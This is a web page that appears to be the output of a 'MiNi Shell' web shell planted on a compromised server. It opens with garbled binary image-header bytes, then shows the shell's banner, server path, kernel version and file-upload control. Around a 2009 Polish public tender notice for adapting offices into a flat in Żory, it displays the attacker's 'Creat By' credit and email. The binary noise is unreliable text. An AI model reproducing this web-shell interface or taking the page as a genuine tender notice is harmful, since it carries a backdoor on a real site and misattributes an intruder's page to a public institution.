JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090805/267802-N-2009.html

<p class="kh_header"><b>Rybnik: Adaptacja pomieszczeń biurowych na cele mieszkalne w budynku przy ul. Leśnej 56 w Żorach</b><br>
<b>Numer ogłoszenia: 267802 - 2009; data zamieszczenia: 05.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Rybnik , ul. Kościuszki 36, 44-200 Rybnik, woj. śląskie, tel. 032 4223748, faks 032 4221972.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.lasy.gov.pl/rybnik</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> rybnik@katowice.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Adaptacja pomieszczeń biurowych na cele mieszkalne w budynku przy ul. Leśnej 56 w Żorach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> - adaptację pomieszczeń biurowych na mieszkanie o pow. 83,70 m2
oraz rozdział 
- pomiaru energii elektrycznej, 
- instalacji wodnej,  
- instalacji c.o. 
- instalacji gazowej,
	- instalacji ciepłej wody użytkowej,
	dla poszczególnych użytkowników w budynku trzyrodzinnym..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.33.00.00-9, 45.11.13.00-1, 45.43.00.00-0, 45.45.30.00-7, 45.42.11.41-4, 45.31.00.00-3, 45.33.00.00-9, 45.33.30.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> a)	Każda oferta musi być zabezpieczona wadium o wartości: 2 000 zł
b)	Wadium może być wniesione w jednej lub kilku następujących formach:
-	pieniądzu
-	poręczeniach bankowych
-	gwarancjach  bankowych
-	gwarancjach ubezpieczeniowych
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt. 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
c)	
	      Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy zamawiającego 
            	Bank Gospodarki Żywnościowej S.A.
		O. KATOWICE
		24203000451110000000420750	

d)	Wadium wnoszone w formie poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału w kasie zamawiającego w pok. nr 04.  Do oferty należy załączyć potwierdzoną przez zamawiającego za zgodność z oryginałem kserokopię dokumentu wadialnego.
e)	Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska) Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania  ofertą, zobowiązanie gwaranta do wypłaty zamawiającego pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.
f)	Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert, tj. do dnia 31.08.2009 r. do godz. 900 ( dowód wpłacenia wadium musi znajdować się u zamawiającego przed upłynięciem terminu  składania ofert) Wadium musi zabezpieczać ofertę do czasu związania z ofertą, zgodnie z art. 85 ustawy.
g)	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym wyżej terminie znajdzie się na rachunku bankowym zamawiającego.
h)	Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania (art. 24 ust. 2 pkt. 4), a jego oferta zostanie uznana za odrzuconą.

i)	Zwrot wadium wykonawcom, których oferty zostały przyjęte nastąpi po:
-	upływie terminu związania z ofertą,
-	zawarciu umowy z wykonawcą, którego ofertę uznano za najkorzystniejszą i wniesieniu przez niego zabezpieczenia należytego wykonania umowy,
-	unieważnieniu postępowania o udzielenie niniejszego zamówienia publicznego, pod warunkiem, iż protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.

j)	Zamawiający, z zastrzeżeniem ust. 4 a, art. 46 ustawy pzp, niezwłocznie dokona zwrotu wadium na wniosek wykonawcy:
-	który wycofał ofertę przed upływem terminu składania ofert,
-	który został wykluczony z postępowania,
-	którego oferta została odrzucona.

k)	Wadium wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zostanie zatrzymane wraz z odsetkami w przypadku, gdy wykonawca:
-	odmówi podpisania umowy na warunkach określonych w ofercie,
-	nie wniesie zabezpieczenia należytego wykonania umowy,
-	zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się wykonawcy, nie podlegający wykluczeniu z postępowania na podstawie art. 24 ust 1 i 2 ustawy pzp.
Aby wykonawca nie został wykluczony - musi spełniać warunki o których mowa w art.22 ustawy, tj:
a. posiadać uprawnienia do wykonywania  określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b. posiadać niezbędną wiedzę i doświadczenie  w zakresie  budownictwa , tj. wykazać, że jako główny wykonawca zrealizował w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zadania o zbliżonym do przedmiotu zamówienia zakresie prac o łącznej wartości co najmniej 70 000 zł ,
c. dysponować środkami technicznymi, niezbędnymi do wykonywania zamówienia, 
d. dysponować osobami zdolnymi do wykonania niniejszego zamówienia - tzn. Wykonawca musi wykazać, że dysponuje:
- osobą mającą ważne uprawnienia budowlane w specjalności ogólnobudowlanej, branży elektrycznej, gazowej. 
e. znajdować się w sytuacji ekonomicznej i finansowej, zapewniającej wykonanie niniejszego zamówienia zgodnie z proponowanym harmonogramem prac, tj. Wykonawca musi wykazać, że posiada środki finansowe lub zdolność kredytową w kwocie wynoszącej co najmniej 80 tys. zł. 
f. nie podlegać wykluczeniu z postępowania na podstawie art.24 ust. 1 i 2.

g. udzielić na zrealizowane roboty budowlane gwarancji na okres co najmniej 24 miesięcy

2. Ocena spełniania  w/w warunków  dokonana będzie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w  dokumentach i oświadczeniach wyszczególnionych w Dz. VII. Z treści wymaganych dokumentów musi wynikać  jednoznacznie ,iż w/w warunki wykonawca spełnił. W przypadku braku wymaganych dokumentów lub oświadczeń, dotyczących  spełniania warunków udziału w postępowaniu 
dokumentów lub oświadczeń, dotyczących spełniania warunków udziału w postępowaniu               a także wymagań przedmiotowych (dotyczących przedmiotu zamówienia) albo złożenia dokumentów lub oświadczeń zawierających błędy - Zamawiający wzywa Wykonawcę do ich uzupełnienia w wyznaczonym terminie , na warunkach określonych w art. 26 , ust. 3 ustawy pzp. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie  wykluczeniem  Wykonawcy z postępowania i odrzuceniem oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oświadczenie , że Wykonawca przystępujący do  udziału w postępowaniu o udzielenie zamówienia  publicznego - spełnia warunki określone w art. 22, ust. 1 
	ustawy pzp i nie podlega wykluczeniu z postępowania  na podstawie  art. 24 ust 1 i 2 - 	Załącznik nr 2 , a w celu jego potwierdzenia składa:
2.	Wykaz osób przewidzianych do realizacji zamówienia - Załącznik nr 3 - (wraz  z załączonymi kserokopiami wymaganych uprawnień i zaświadczeń o wpisie do właściwej izby samorządu zawodowego).
3.	Wykaz podmiotów, których Wykonawca  zamierza zatrudnić jako podwykonawców - Załącznik nr 4 - wraz ze wskazaniem powierzonego zakresu robót
4.	Oświadczenie o dysponowaniu niezbędnymi środkami technicznymi , - Załącznik nr 5
5.	Wykaz ważniejszych robót, zrealizowanych w okresie ostatnich 5 lat, odpowiadających swoim rodzajem - robotom stanowiącym przedmiot zamówienia - Załącznik nr 6 (wraz z udokumentowaniem  ich należytego wykonania - referencje wystawione przez inwestora).
6.	Aktualny odpis z właściwego rejestru albo aktualne  zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.
7.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24, ust. 1 pkt 4-8 ustawy  wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
8.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24, ust. 1. pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (dotyczy  podmiotów zbiorowych).
9.	Aktualne zaświadczenie  właściwego naczelnika urzędu skarbowego, potwierdzające , ze Wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie o uzyskaniu przewidzianej prawem  zgody na zwolnienie, odroczenie lub rozłożenie zaległych płatności na raty lub wstrzymaniu w całości wykonania decyzji  organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
10.	Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego  Ubezpieczenia Społecznego, potwierdzające ,ze Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne , lub zaświadczenie o uzyskaniu przewidzianej prawem zgody na zwolnienie, odroczenie lub rozłożenie na  raty lub wstrzymaniu w całości wykonania decyzji organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
11.	Informacja  banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w  którym Wykonawca posiada rachunek , potwierdzająca wysokość posiadanych środków  finansowych lub  zdolność kredytową Wykonawcy - wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
12.	Polisa lub inny dokument, potwierdzający , ze Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
13.	Dokumenty stwierdzające, że osoby zatrudnione przy wykonywaniu zamówienia posiadają  uprawnienia , odpowiednie do funkcji i stanowiska, na którym będą pracować, jak również potwierdzające przynależność do właściwej izby samorządu zawodowego (załączyć  do wykazu pracowników - zał. nr3)
14.	Referencje zamawiających (inwestorów) z okresu ostatnich pięciu lat - potwierdzających , że wykazane w załączniku nr 5 roboty, zostały wykonane należycie (załączyć do wykazu wykonanych prac - zał nr 5)
15.	Szczegółowy kosztorys ofertowy wypełniony w oparciu o przedmiar robót (załącznik nr 8)
16.	Kserokopie dokumentu wadialnego
17.	Harmonogram rzeczowo- finansowy realizacji robót określający poszczególne etapy prac, terminy oraz wartości robót na poszczególnych etapach..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 0.9</li>
<li>2 - gwarancja - 0.1</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.katowice.lasy.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rybnik, ul. Kościuszki 36.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2009 godzina 09:00, miejsce: Rybnik, ul. Kościuszki 36, pokój nr 3.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com